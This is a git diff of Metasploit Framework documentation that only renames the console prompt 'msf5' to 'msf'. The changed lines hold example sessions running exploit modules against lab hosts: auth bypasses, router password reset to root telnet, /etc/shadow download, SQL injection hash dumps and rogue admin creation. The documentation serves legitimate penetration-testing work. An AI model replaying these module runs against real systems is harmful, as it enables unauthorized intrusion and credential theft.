diff --git a/docs/metasploit-framework.wiki/Hashes-and-Password-Cracking.md b/docs/metasploit-framework.wiki/Hashes-and-Password-Cracking.md index 382a1d9868..7554325598 100644 --- a/docs/metasploit-framework.wiki/Hashes-and-Password-Cracking.md +++ b/docs/metasploit-framework.wiki/Hashes-and-Password-Cracking.md @@ -18,7 +18,7 @@ puts identify_hash "_9G..8147mpcfKT8g0U." ``` In practice, we receive the following output from this: ```ruby -msf5 > irb +msf > irb [*] Starting IRB shell... [*] You are in the "framework" object diff --git a/docs/metasploit-framework.wiki/How-to-get-Oracle-Support-working-with-Kali-Linux.md b/docs/metasploit-framework.wiki/How-to-get-Oracle-Support-working-with-Kali-Linux.md index 879e6aed58..11fac27ced 100644 --- a/docs/metasploit-framework.wiki/How-to-get-Oracle-Support-working-with-Kali-Linux.md +++ b/docs/metasploit-framework.wiki/How-to-get-Oracle-Support-working-with-Kali-Linux.md @@ -12,7 +12,7 @@ msf auxiliary(oracle_login) > run ``` or ```msf -msf5 auxiliary(scanner/oracle/oracle_hashdump) > run +msf auxiliary(scanner/oracle/oracle_hashdump) > run [-] Failed to load the OCI library: cannot load such file -- oci8 [-] Try 'gem install ruby-oci8' diff --git a/docs/metasploit-framework.wiki/Metasploit-URL-support-proposal.md b/docs/metasploit-framework.wiki/Metasploit-URL-support-proposal.md index 5db713e0f8..3b65ce6f35 100644 --- a/docs/metasploit-framework.wiki/Metasploit-URL-support-proposal.md +++ b/docs/metasploit-framework.wiki/Metasploit-URL-support-proposal.md @@ -61,7 +61,7 @@ When the user views the options for a given module, it will be consolidated. The Multiple options are available for configuring the module options: ```msf -msf5 exploit(multi/http/tomcat_mgr_upload) > options +msf exploit(multi/http/tomcat_mgr_upload) > options Module options (exploit/multi/http/tomcat_mgr_upload): 
@@ -88,7 +88,7 @@ Exploit target: Multiple options are consolidated into a single TARGETS field: ```msf -msf5 exploit(multi/http/tomcat_mgr_upload) > options +msf exploit(multi/http/tomcat_mgr_upload) > options Module options (exploit/multi/http/tomcat_mgr_upload): diff --git a/docs/metasploit-framework.wiki/Work-needed-to-allow-msfdb-to-use-postgresql-common.md b/docs/metasploit-framework.wiki/Work-needed-to-allow-msfdb-to-use-postgresql-common.md index c8e9346951..9bd4dbad63 100644 --- a/docs/metasploit-framework.wiki/Work-needed-to-allow-msfdb-to-use-postgresql-common.md +++ b/docs/metasploit-framework.wiki/Work-needed-to-allow-msfdb-to-use-postgresql-common.md @@ -163,7 +163,7 @@ Start `msfconsole` and verify postgresql connection using the `db_status` comman mv ~/.msf4/config ~/.msf4/config.disable ./msfconsole ... -msf5 > db_status +msf > db_status [*] Connected to msf. Connection type: postgresql. ``` @@ -171,4 +171,4 @@ Drop (delete) the cluster: ``` PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_dropcluster 9.6 msf -``` \ No newline at end of file +``` diff --git a/documentation/cli/msfconsole/jobs.md b/documentation/cli/msfconsole/jobs.md index 1f07db9ec5..ed8758feda 100644 --- a/documentation/cli/msfconsole/jobs.md +++ b/documentation/cli/msfconsole/jobs.md @@ -81,12 +81,12 @@ Examples Starting a module as a job: - msf5 exploit(multi/handler) > run -j + msf exploit(multi/handler) > run -j [*] Exploit running as background job 1. A verbose listing of all the jobs: - msf5 exploit(multi/handler) > jobs -v + msf exploit(multi/handler) > jobs -v Jobs ==== 
@@ -97,16 +97,16 @@ A verbose listing of all the jobs: Set some jobs to be started on `msfconsole` start: - msf5 exploit(multi/handler) > jobs -p 1-2 + msf exploit(multi/handler) > jobs -p 1-2 Added persistence to job 1. Added persistence to job 2. Getting information about a specific job: - msf5 exploit(multi/handler) > jobs -i 1 + msf exploit(multi/handler) > jobs -i 1 Name: Generic Payload Handler, started at 2019-02-20 19:03:19 -0600 - msf5 exploit(multi/handler) > jobs -i 1 -v + msf exploit(multi/handler) > jobs -i 1 -v Name: Generic Payload Handler, started at 2019-02-20 19:03:19 -0600 diff --git a/documentation/cli/msfconsole/repeat.md b/documentation/cli/msfconsole/repeat.md index 455bc8802b..e00543cb6c 100644 --- a/documentation/cli/msfconsole/repeat.md +++ b/documentation/cli/msfconsole/repeat.md @@ -30,8 +30,8 @@ Examples Run the heartbleed module every 10 seconds against a server for an hour: - msf5 > use auxiliary/scanner/ssl/openssl_heartbleed - msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set ACTION DUMP + msf > use auxiliary/scanner/ssl/openssl_heartbleed + msf auxiliary(scanner/ssl/openssl_heartbleed) > set ACTION DUMP # Set other options... - msf5 auxiliary(scanner/ssl/openssl_heartbleed) > repeat -t 3600 run; sleep 10 + msf auxiliary(scanner/ssl/openssl_heartbleed) > repeat -t 3600 run; sleep 10 diff --git a/documentation/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.md b/documentation/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.md index 6d5577fae5..52f896b87b 100644 --- a/documentation/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.md +++ b/documentation/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.md 
@@ -38,14 +38,14 @@ The desired username for setting SSH access #### Successful Scenario ``` -msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test +msf > use auxiliary/admin/http/cisco_7937g_ssh_privesc +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test user => test -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test pass => test -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209 +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209 rhosts => 192.168.110.209 -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > run [*] Running for 192.168.110.209... [*] 192.168.110.209 - Attempting to set SSH credentials. @@ -55,7 +55,7 @@ msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run [*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(linux/ssh/cve_2020_16137) > exit +msf auxiliary(linux/ssh/cve_2020_16137) > exit user@ubuntu:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209 test@192.168.110.209's password: 
@@ -225,14 +225,14 @@ $>exit #### Unsuccessful Scenario ``` -msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test +msf > use auxiliary/admin/http/cisco_7937g_ssh_privesc +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test user => test -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test pass => test -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209 +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209 rhosts => 192.168.110.209 -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > run [*] Running for 192.168.110.209... [*] 192.168.110.209 - Attempting to set SSH credentials. @@ -246,14 +246,14 @@ msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run #### Successful Scenario ``` -msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test +msf > use auxiliary/admin/http/cisco_7937g_ssh_privesc +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test user => test -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test pass => test -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209 +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209 rhosts => 192.168.110.209 -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > run [*] Running for 192.168.110.209... [*] 192.168.110.209 - Attempting to set SSH credentials. 
@@ -263,7 +263,7 @@ msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run [*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(linux/ssh/cve_2020_16137) > exit +msf auxiliary(linux/ssh/cve_2020_16137) > exit user@ubuntu:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209 test@192.168.110.209's password: @@ -433,14 +433,14 @@ $>exit #### Unsuccessful Scenario ``` -msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test +msf > use auxiliary/admin/http/cisco_7937g_ssh_privesc +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test user => test -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test pass => test -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209 +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209 rhosts => 192.168.110.209 -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > run [*] Running for 192.168.110.209... [*] 192.168.110.209 - Attempting to set SSH credentials. diff --git a/documentation/modules/auxiliary/admin/http/grafana_auth_bypass.md b/documentation/modules/auxiliary/admin/http/grafana_auth_bypass.md index 73fe564999..5dd0dc4c28 100644 --- a/documentation/modules/auxiliary/admin/http/grafana_auth_bypass.md +++ b/documentation/modules/auxiliary/admin/http/grafana_auth_bypass.md 
@@ -22,8 +22,8 @@ The following list shows the vulnerable versions of Grafana when configured for Example run against Grafana 3.x with username admin: ``` -msf5 > use auxiliary/admin/http/grafana_auth_bypass -msf5 auxiliary(admin/http/grafana_auth_bypass) > show options +msf > use auxiliary/admin/http/grafana_auth_bypass +msf auxiliary(admin/http/grafana_auth_bypass) > show options Module options (auxiliary/admin/http/grafana_auth_bypass): @@ -38,11 +38,11 @@ Module options (auxiliary/admin/http/grafana_auth_bypass): USERNAME no Valid username VERSION 5 yes Grafana version: "2-4" or "5" (Accepted: 2-4, 5) -msf5 auxiliary(admin/http/grafana_auth_bypass) > set RHOSTS 192.168.202.3 +msf auxiliary(admin/http/grafana_auth_bypass) > set RHOSTS 192.168.202.3 RHOSTS => 192.168.202.3 -msf5 auxiliary(admin/http/grafana_auth_bypass) > set USERNAME Administrator +msf auxiliary(admin/http/grafana_auth_bypass) > set USERNAME Administrator USERNAME => Administrator -msf5 auxiliary(admin/http/grafana_auth_bypass) > run +msf auxiliary(admin/http/grafana_auth_bypass) > run [*] Running for 192.168.202.3... [+] Encrypted remember cookie: 1bedc565c40b58307afa4672efd72d3c37f02684c2deb0ce0b55594cbce337fc90625356dc232e998f diff --git a/documentation/modules/auxiliary/admin/http/ibm_drm_download.md b/documentation/modules/auxiliary/admin/http/ibm_drm_download.md index 25a7df5ecb..b4adf83a79 100644 --- a/documentation/modules/auxiliary/admin/http/ibm_drm_download.md +++ b/documentation/modules/auxiliary/admin/http/ibm_drm_download.md @@ -25,7 +25,7 @@ Module defaults work very well, you should just need to set `RHOST` and the `FIL A successful exploit will look like this: ``` -msf5 auxiliary(admin/http/ibm_drm_file_download) > run +msf auxiliary(admin/http/ibm_drm_file_download) > run [+] 10.9.8.213:8443 - Successfully "stickied" our session ID kmhleyPh [+] 10.9.8.213:8443 - We have obtained a new admin password 28010e88-6ffb-46e9-90d6-2ded732120d1 
diff --git a/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md b/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md index 1c1ed53459..1ff803d483 100644 --- a/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md +++ b/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md @@ -54,8 +54,8 @@ upnpd port on the target. Default 5000. ### Netgear R6700v3 firmware version V1.0.4.84_10.0.58 ``` - msf5 > use auxiliary/admin/http/netgear_r6700_pass_reset - msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options + msf > use auxiliary/admin/http/netgear_r6700_pass_reset + msf auxiliary(admin/http/netgear_r6700_pass_reset) > show options Module options (auxiliary/admin/http/netgear_r6700_pass_reset): @@ -67,13 +67,13 @@ upnpd port on the target. Default 5000. SSL false no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host - msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1 + msf auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1 RHOSTS => 192.168.1.1 - msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check + msf auxiliary(admin/http/netgear_r6700_pass_reset) > check [*] Target is running firmware version 1.0.4.84 [*] 192.168.1.1:5000 - The target appears to be vulnerable. - msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit + msf auxiliary(admin/http/netgear_r6700_pass_reset) > exploit [*] Running module against 192.168.1.1 [*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target. 
@@ -93,24 +93,24 @@ upnpd port on the target. Default 5000. [*] 2.7- run it and login with 'admin:' [*] 3- Enjoy your root shell! [*] Auxiliary module execution completed - msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > + msf auxiliary(admin/http/netgear_r6700_pass_reset) > ``` Browsed to admin page and changed password to `testing123`, then in a new `msfconsole` session running as `root`, entered the following commands: ``` - msf5 > use exploit/linux/telnet/netgear_telnetenable + msf > use exploit/linux/telnet/netgear_telnetenable [*] No payload configured, defaulting to cmd/unix/interact - msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin + msf exploit(linux/telnet/netgear_telnetenable) > set username admin username => admin - msf5 exploit(linux/telnet/netgear_telnetenable) > set password testing123 + msf exploit(linux/telnet/netgear_telnetenable) > set password testing123 password => testing123 - msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9 + msf exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9 MAC => D56C89FC94C9 - msf5 exploit(linux/telnet/netgear_telnetenable) > set RHOSTS 192.168.1.1 + msf exploit(linux/telnet/netgear_telnetenable) > set RHOSTS 192.168.1.1 RHOSTS => 192.168.1.1 - msf5 exploit(linux/telnet/netgear_telnetenable) > exploit + msf exploit(linux/telnet/netgear_telnetenable) > exploit [+] 192.168.1.1:23 - Detected telnetenabled on UDP [+] 192.168.1.1:23 - Using creds admin:testing123 @@ -147,8 +147,8 @@ session running as `root`, entered the following commands: ### Netgear R6700v3 firmware version V1.0.0.4.82_10.0.57 ``` - msf5 > use auxiliary/admin/http/netgear_r6700_pass_reset - msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options + msf > use auxiliary/admin/http/netgear_r6700_pass_reset + msf auxiliary(admin/http/netgear_r6700_pass_reset) > show options Module options (auxiliary/admin/http/netgear_r6700_pass_reset): 
@@ -160,13 +160,13 @@ session running as `root`, entered the following commands: SSL false no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host - msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1 + msf auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1 RHOSTS => 192.168.1.1 - msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check + msf auxiliary(admin/http/netgear_r6700_pass_reset) > check [*] Target is running firmware version 1.0.4.82 [*] 192.168.1.1:5000 - The target appears to be vulnerable. - msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit + msf auxiliary(admin/http/netgear_r6700_pass_reset) > exploit [*] Running module against 192.168.1.1 [*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.82_10.0.57) as the target. @@ -186,16 +186,16 @@ session running as `root`, entered the following commands: [*] 2.7- run it and login with 'admin:' [*] 3- Enjoy your root shell! [*] Auxiliary module execution completed - msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > + msf auxiliary(admin/http/netgear_r6700_pass_reset) > ``` Browsed to admin page and changed password to `testing123`, then in a new `msfconsole` session running as `root`, entered the following commands: ``` - msf5 > use exploit/linux/telnet/netgear_telnetenable + msf > use exploit/linux/telnet/netgear_telnetenable [*] No payload configured, defaulting to cmd/unix/interact - msf5 exploit(linux/telnet/netgear_telnetenable) > show options + msf exploit(linux/telnet/netgear_telnetenable) > show options Module options (exploit/linux/telnet/netgear_telnetenable): 
@@ -226,15 +226,15 @@ session running as `root`, entered the following commands: 0 Automatic (detect TCP or UDP) - msf5 exploit(linux/telnet/netgear_telnetenable) > set RHOST 192.168.1.1 + msf exploit(linux/telnet/netgear_telnetenable) > set RHOST 192.168.1.1 RHOST => 192.168.1.1 - set msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin + set msf exploit(linux/telnet/netgear_telnetenable) > set username admin username => admin - msf5 exploit(linux/telnet/netgear_telnetenable) > set password testing123 + msf exploit(linux/telnet/netgear_telnetenable) > set password testing123 password => testing123 - msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9 + msf exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9 MAC => D56C89FC94C9 - msf5 exploit(linux/telnet/netgear_telnetenable) > exploit + msf exploit(linux/telnet/netgear_telnetenable) > exploit [+] 192.168.1.1:23 - Detected telnetenabled on UDP [+] 192.168.1.1:23 - Using creds admin:testing123 diff --git a/documentation/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.md b/documentation/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.md index d51d06a427..2a375abda1 100644 --- a/documentation/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.md +++ b/documentation/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.md 
@@ -18,12 +18,12 @@ Doo-doodoodoodoodoo-doo, Epic Sax Guy will be broadcasted to the remote system. ## Scenarios ``` -msf5 > use auxiliary/admin/http/supra_smart_cloud_tv_rfi -msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set SRVHOST 192.168.1.132 +msf > use auxiliary/admin/http/supra_smart_cloud_tv_rfi +msf auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set SRVHOST 192.168.1.132 SRVHOST => 192.168.1.132 -msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set RHOSTS 192.168.1.155 +msf auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set RHOSTS 192.168.1.155 RHOSTS => 192.168.1.155 -msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run +msf auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run [*] Running module against 192.168.1.155 [*] Using URL: http://192.168.1.132:8080/ [*] Broadcasting Epic Sax Guy to 192.168.1.155:80 @@ -31,5 +31,5 @@ msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run [*] Sleeping for 10s serving .m3u8 and .ts files... [*] Server stopped. [*] Auxiliary module execution completed -msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > +msf auxiliary(admin/http/supra_smart_cloud_tv_rfi) > ``` diff --git a/documentation/modules/auxiliary/admin/http/typo3_news_module_sqli.md b/documentation/modules/auxiliary/admin/http/typo3_news_module_sqli.md index 6330a66b89..193fc51d55 100644 --- a/documentation/modules/auxiliary/admin/http/typo3_news_module_sqli.md +++ b/documentation/modules/auxiliary/admin/http/typo3_news_module_sqli.md @@ -45,5 +45,5 @@ id => 37 [+] Username: admin [+] Password Hash: $P$Ch4lme3.gje9o.DjMip59baG7b/mIp. [*] Auxiliary module execution completed -msf5 auxiliary(admin/http/typo3_news_module_sqli) > +msf auxiliary(admin/http/typo3_news_module_sqli) > ``` diff --git a/documentation/modules/auxiliary/admin/http/ulterius_file_download.md b/documentation/modules/auxiliary/admin/http/ulterius_file_download.md index 4c899443b4..d00fa4cc06 100644 
--- a/documentation/modules/auxiliary/admin/http/ulterius_file_download.md +++ b/documentation/modules/auxiliary/admin/http/ulterius_file_download.md @@ -45,20 +45,20 @@ Note: If you are using relative paths, use three periods when traversing down a ### Ulterius Server v1.8.0.0 on Windows 7 SP1 x64. ``` -msf5 > use auxiliary/admin/http/ulterius_file_download -msf5 auxiliary(admin/http/ulterius_file_download) > set rhost 172.22.222.122 +msf > use auxiliary/admin/http/ulterius_file_download +msf auxiliary(admin/http/ulterius_file_download) > set rhost 172.22.222.122 rhost => 172.22.222.122 -msf5 auxiliary(admin/http/ulterius_file_download) > run +msf auxiliary(admin/http/ulterius_file_download) > run [*] Starting to parse fileIndex.db... [*] Remote file paths saved in: filepath0 [*] Auxiliary module execution completed -msf5 auxiliary(admin/http/ulterius_file_download) > set path 'C:/users/pwnduser/desktop/tmp.txt' +msf auxiliary(admin/http/ulterius_file_download) > set path 'C:/users/pwnduser/desktop/tmp.txt' path => C:/users/pwnduser/desktop/tmp.txt -msf5 auxiliary(admin/http/ulterius_file_download) > run +msf auxiliary(admin/http/ulterius_file_download) > run [*] C:/users/pwnduser/desktop/tmp.txt [*] File contents saved: filepath1 [*] Auxiliary module execution completed -msf5 auxiliary(admin/http/ulterius_file_download) > +msf auxiliary(admin/http/ulterius_file_download) > ``` diff --git a/documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.md b/documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.md index e5180a5190..3d755beebb 100644 --- a/documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.md +++ b/documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.md 
@@ -25,24 +25,24 @@ This module changes the admin email (optional) to prevent notification sending, ### Tested on Debian 9.6 running Wordpress 4.7.5 with WordPress GDPR Compliance plugin 1.4.2: ``` -msf5 > use auxiliary/admin/http/wp_gdpr_compliance_privesc -msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > set verbose true +msf > use auxiliary/admin/http/wp_gdpr_compliance_privesc +msf auxiliary(admin/http/wp_gdpr_compliance_privesc) > set verbose true verbose => true -msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > set rhosts 172.22.222.145 +msf auxiliary(admin/http/wp_gdpr_compliance_privesc) > set rhosts 172.22.222.145 rhosts => 172.22.222.145 -msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > set email test@example.com +msf auxiliary(admin/http/wp_gdpr_compliance_privesc) > set email test@example.com email => test@example.com -msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > check +msf auxiliary(admin/http/wp_gdpr_compliance_privesc) > check [*] Checking /wp-content/plugins/wp-gdpr-compliance/readme.txt [*] Found version 1.4.2 of the plugin [*] 172.22.222.145:80 The target appears to be vulnerable. -msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > exploit +msf auxiliary(admin/http/wp_gdpr_compliance_privesc) > exploit [*] Getting security token from host... [!] Enabling user registrations... [!] Setting the default user role type to administrator... [*] Registering msfuser with email test@example.com [*] Auxiliary module execution completed -msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > +msf auxiliary(admin/http/wp_gdpr_compliance_privesc) > ``` diff --git a/documentation/modules/auxiliary/admin/http/wp_google_maps_sqli.md b/documentation/modules/auxiliary/admin/http/wp_google_maps_sqli.md index 9f8809914f..8fd8db2c8a 100644 --- a/documentation/modules/auxiliary/admin/http/wp_google_maps_sqli.md +++ b/documentation/modules/auxiliary/admin/http/wp_google_maps_sqli.md 
@@ -23,7 +23,7 @@ Change the table prefix. By default, this option is set to `wp_`. ### wp-google-maps 7.11.17 on WordPress 4.9.5 ``` -msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit +msf auxiliary(admin/http/wp_google_maps_sqli) > exploit [*] Running module against 172.22.222.144 [*] 172.22.222.144:80 - Trying to retrieve the wp_users table... diff --git a/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md b/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md index 5d41904c6a..fd0a337f6b 100644 --- a/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md +++ b/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md @@ -95,13 +95,13 @@ Auxiliary action: View the full module info with the info, or info -d command. -msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set rhosts [redacted] +msf auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set rhosts [redacted] rhosts => [redacted] -msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set new_username msfadmin +msf auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set new_username msfadmin new_username => msfadmin -msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set new_password msfadmin +msf auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set new_password msfadmin new_password => msfadmin -msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > run +msf auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > run [*] Running module against [redacted] not verifying SSL hostname of LDAPS server '[redacted]:636' 
@@ -145,7 +145,7 @@ vmwpasswordprohibitedpreviouscount: [redacted] [+] Added user msfadmin, so auth bypass was successful! [+] Added user msfadmin to admin group [*] Auxiliary module execution completed -msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > +msf auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > ``` ### VMware vCenter Server 6.7.0.2 virtual appliance on ESXi (not vulnerable target) diff --git a/documentation/modules/auxiliary/admin/networking/brocade_config.md b/documentation/modules/auxiliary/admin/networking/brocade_config.md index a3176c1a21..400717822e 100644 --- a/documentation/modules/auxiliary/admin/networking/brocade_config.md +++ b/documentation/modules/auxiliary/admin/networking/brocade_config.md @@ -150,13 +150,13 @@ File path to the configuration file. ## Scenarios ``` -msf5 > wget https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/brocade_08.0.30hT311_ic_icx6430.conf -o /dev/null -O /tmp/brocade.conf -msf5 > use auxiliary/admin/networking/brocade_config -msf5 auxiliary(admin/networking/brocade_config) > set rhosts 127.0.0.1 +msf > wget https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/brocade_08.0.30hT311_ic_icx6430.conf -o /dev/null -O /tmp/brocade.conf +msf > use auxiliary/admin/networking/brocade_config +msf auxiliary(admin/networking/brocade_config) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 auxiliary(admin/networking/brocade_config) > set config /tmp/brocade.conf +msf auxiliary(admin/networking/brocade_config) > set config /tmp/brocade.conf config => /tmp/brocade.conf -msf5 auxiliary(admin/networking/brocade_config) > run +msf auxiliary(admin/networking/brocade_config) > run [*] Running module against 127.0.0.1 [*] Importing config diff --git a/documentation/modules/auxiliary/admin/networking/cisco_config.md b/documentation/modules/auxiliary/admin/networking/cisco_config.md index f00ffb00a8..994d7901de 100644 
--- a/documentation/modules/auxiliary/admin/networking/cisco_config.md +++ b/documentation/modules/auxiliary/admin/networking/cisco_config.md @@ -37,12 +37,12 @@ root@metasploit-dev:~/metasploit-framework# wget https://raw.githubusercontent.c root@metasploit-dev:~/metasploit-framework# ./msfconsole [*] Starting persistent handler(s)... -msf5 > use auxiliary/admin/networking/cisco_config -msf5 auxiliary(admin/networking/cisco_config) > set config /tmp/LA_EDGE_D.txt +msf > use auxiliary/admin/networking/cisco_config +msf auxiliary(admin/networking/cisco_config) > set config /tmp/LA_EDGE_D.txt config => /tmp/LA_EDGE_D.txt -msf5 auxiliary(admin/networking/cisco_config) > set rhost 127.0.0.1 +msf auxiliary(admin/networking/cisco_config) > set rhost 127.0.0.1 rhost => 127.0.0.1 -msf5 auxiliary(admin/networking/cisco_config) > run +msf auxiliary(admin/networking/cisco_config) > run [*] Running module against 127.0.0.1 [*] Importing config diff --git a/documentation/modules/auxiliary/admin/networking/cisco_dcnm_download.md b/documentation/modules/auxiliary/admin/networking/cisco_dcnm_download.md index 4d298f32e3..482fb35154 100644 --- a/documentation/modules/auxiliary/admin/networking/cisco_dcnm_download.md +++ b/documentation/modules/auxiliary/admin/networking/cisco_dcnm_download.md 
@@ -21,11 +21,11 @@ work on a few versions below 10.4(2). Only version 11.0(1) requires authenticati Setup RHOST, pick the file to download (FILENAME, default is /etc/shadow) and enjoy! ``` -msf5 exploit > use auxiliary/admin/networking/cisco_dcnm_download +msf exploit > use auxiliary/admin/networking/cisco_dcnm_download -msf5 auxiliary(admin/networking/cisco_dcnm_download) > set rhost 10.75.1.40 +msf auxiliary(admin/networking/cisco_dcnm_download) > set rhost 10.75.1.40 rhost => 10.75.1.40 -msf5 auxiliary(admin/networking/cisco_dcnm_download) > run +msf auxiliary(admin/networking/cisco_dcnm_download) > run [+] 10.75.1.40:443 - Detected DCNM 10.4(2) [*] 10.75.1.40:443 - No authentication required, ready to exploit! diff --git a/documentation/modules/auxiliary/admin/networking/juniper_config.md b/documentation/modules/auxiliary/admin/networking/juniper_config.md index 6d71b57140..fc9330990d 100644 --- a/documentation/modules/auxiliary/admin/networking/juniper_config.md +++ b/documentation/modules/auxiliary/admin/networking/juniper_config.md @@ -1037,12 +1037,12 @@ 